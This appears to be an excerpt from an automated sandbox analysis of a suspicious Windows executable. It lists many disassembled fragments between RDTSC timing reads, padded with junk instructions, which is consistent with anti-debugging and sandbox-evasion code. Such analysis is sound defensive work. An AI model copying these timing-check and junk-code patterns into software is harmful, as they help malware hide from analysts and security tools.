                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60E8FD second address: 60E91D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9E4B29224h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60E91D second address: 60E921 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60EAC8 second address: 60EACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60EBF4 second address: 60EBFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60EBFE second address: 60EC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60ED4A second address: 60ED6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB9E5277428h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60ED6B second address: 60ED6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60ED6F second address: 60ED75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60ED75 second address: 60ED83 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FB9E4B29218h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60ED83 second address: 60ED87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 60F009 second address: 60F011 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 612C6F second address: 612C9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E527741Bh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FB9E5277428h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 612C9B second address: 612CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E4B29227h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FB9E4B2921Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 618364 second address: 618388 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB9E5277416h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 push edx 0x00000013 ja 00007FB9E5277416h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b pop edx 0x0000001c jbe 00007FB9E527741Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 618388 second address: 618391 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 618391 second address: 6183D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB9E5277422h 0x0000000b jng 00007FB9E5277416h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB9E527741Ch 0x00000019 jmp 00007FB9E5277428h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6183D6 second address: 6183F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29220h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FB9E4B29216h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6183F4 second address: 6183F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6183F8 second address: 618402 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 618402 second address: 618408 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61716A second address: 617189 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007FB9E4B29226h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61780F second address: 61781A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61781A second address: 61782D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 617B22 second address: 617B3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB9E5277426h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 617B3C second address: 617B40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 617B40 second address: 617B5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB9E5277416h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB9E5277421h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6180B4 second address: 6180BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6180BF second address: 6180CB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61B9F0 second address: 61B9FC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FB9E4B29216h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D66EA second address: 5D6739 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9E527741Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov ecx, dword ptr [ebp+122D1F73h] 0x00000011 lea eax, dword ptr [ebp+12471488h] 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FB9E5277418h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 or dword ptr [ebp+122D20D4h], edx 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d pop edx 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D6739 second address: 5D6740 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D6740 second address: 5BB9E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jmp 00007FB9E5277420h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FB9E5277418h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edx, dword ptr [ebp+122D32F1h] 0x0000002e call dword ptr [ebp+122D32CFh] 0x00000034 je 00007FB9E5277432h 0x0000003a jl 00007FB9E527741Eh 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D6D21 second address: 5D6D27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D6D27 second address: 5D6D58 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E5277418h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jbe 00007FB9E5277416h 0x00000015 jnp 00007FB9E5277416h 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FB9E5277423h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D6D58 second address: 438963 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d mov ax, 96C0h 0x00000011 mov ebx, dword ptr [ebp+122D1962h] 0x00000017 popad 0x00000018 adc edx, 4209E63Ch 0x0000001e push dword ptr [ebp+122D104Dh] 0x00000024 movsx edx, si 0x00000027 call dword ptr [ebp+122D1F6Ah] 0x0000002d pushad 0x0000002e pushad 0x0000002f mov cl, 4Ch 0x00000031 sub dword ptr [ebp+122D30A0h], eax 0x00000037 popad 0x00000038 xor eax, eax 0x0000003a add dword ptr [ebp+122D30A0h], edi 0x00000040 mov edx, dword ptr [esp+28h] 0x00000044 jno 00007FB9E4B2922Ch 0x0000004a mov dword ptr [ebp+122D290Eh], eax 0x00000050 jmp 00007FB9E4B29228h 0x00000055 mov esi, 0000003Ch 0x0000005a jmp 00007FB9E4B29226h 0x0000005f jmp 00007FB9E4B2921Ch 0x00000064 add esi, dword ptr [esp+24h] 0x00000068 jmp 00007FB9E4B29227h 0x0000006d lodsw 0x0000006f pushad 0x00000070 push eax 0x00000071 push edi 0x00000072 pop esi 0x00000073 pop esi 0x00000074 jmp 00007FB9E4B2921Fh 0x00000079 popad 0x0000007a cld 0x0000007b add eax, dword ptr [esp+24h] 0x0000007f sub dword ptr [ebp+122D30A0h], edi 0x00000085 mov ebx, dword ptr [esp+24h] 0x00000089 xor dword ptr [ebp+122D30A0h], esi 0x0000008f push eax 0x00000090 jo 00007FB9E4B29220h 0x00000096 push eax 0x00000097 push edx 0x00000098 pushad 0x00000099 popad 0x0000009a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D6DE4 second address: 5D6E24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E5277428h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a xor dword ptr [esp], 0E89ABD9h 0x00000011 push F246C21Fh 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FB9E5277423h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D6E24 second address: 5D6E38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29220h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D6E38 second address: 5D6E3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D7946 second address: 5D7953 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D7953 second address: 5D7958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D7958 second address: 5D7991 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007FB9E4B29222h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007FB9E4B29222h 0x00000017 je 00007FB9E4B2921Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D7991 second address: 5D79B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB9E5277426h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D79B0 second address: 5D79BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FB9E4B29216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 5D7B10 second address: 5BC576 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 mov dword ptr [esp], eax 0x0000000a push esi 0x0000000b pop edx 0x0000000c call dword ptr [ebp+122D1D66h] 0x00000012 jmp 00007FB9E527741Dh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB9E5277425h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61BCB2 second address: 61BCB7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61BF5C second address: 61BF7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FB9E5277426h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61BF7B second address: 61BF95 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB9E4B29216h 0x00000008 jmp 00007FB9E4B29220h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61BF95 second address: 61BF9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61C0D8 second address: 61C0FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB9E4B29216h 0x0000000a ja 00007FB9E4B29216h 0x00000010 jno 00007FB9E4B29216h 0x00000016 popad 0x00000017 jnl 00007FB9E4B2921Ch 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61C0FB second address: 61C10B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB9E527741Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61C526 second address: 61C52B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 61C52B second address: 61C533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 621316 second address: 62131C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 623261 second address: 623266 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 623407 second address: 623418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007FB9E4B29216h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 623418 second address: 62341C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6262DE second address: 626311 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B29225h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jnp 00007FB9E4B29216h 0x00000010 jmp 00007FB9E4B2921Ch 0x00000015 pop esi 0x00000016 popad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62BC13 second address: 62BC1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62BC1B second address: 62BC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62C2BD second address: 62C2E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB9E5277428h 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62C2E3 second address: 62C2F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB9E4B2921Ch 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 62CC21 second address: 62CC2B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB9E527741Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 634984 second address: 63498E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB9E4B29216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 634357 second address: 63435D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63BD25 second address: 63BD36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB9E4B29216h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 639E3E second address: 639E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB9E5277416h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 639E48 second address: 639E55 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB9E4B29216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63A12B second address: 63A12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63AC6F second address: 63AC7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB9E4B29216h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63AC7E second address: 63AC82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63AC82 second address: 63AC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FB9E4B29216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63AC8E second address: 63AC99 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jno 00007FB9E5277416h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B4BB second address: 63B4C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B77E second address: 63B799 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB9E5277416h 0x00000008 jns 00007FB9E5277416h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007FB9E5277416h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B799 second address: 63B79F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B79F second address: 63B7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63B7A5 second address: 63B7AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FB3E second address: 63FB42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FB42 second address: 63FB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FB9E4B2921Ch 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FFA4 second address: 63FFAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FFAF second address: 63FFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 63FFB3 second address: 63FFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\hx0wBsOjkQ.exeRDTSC instruction interceptor: First address: 6400F3 second address: 640112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB9E4B29221h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
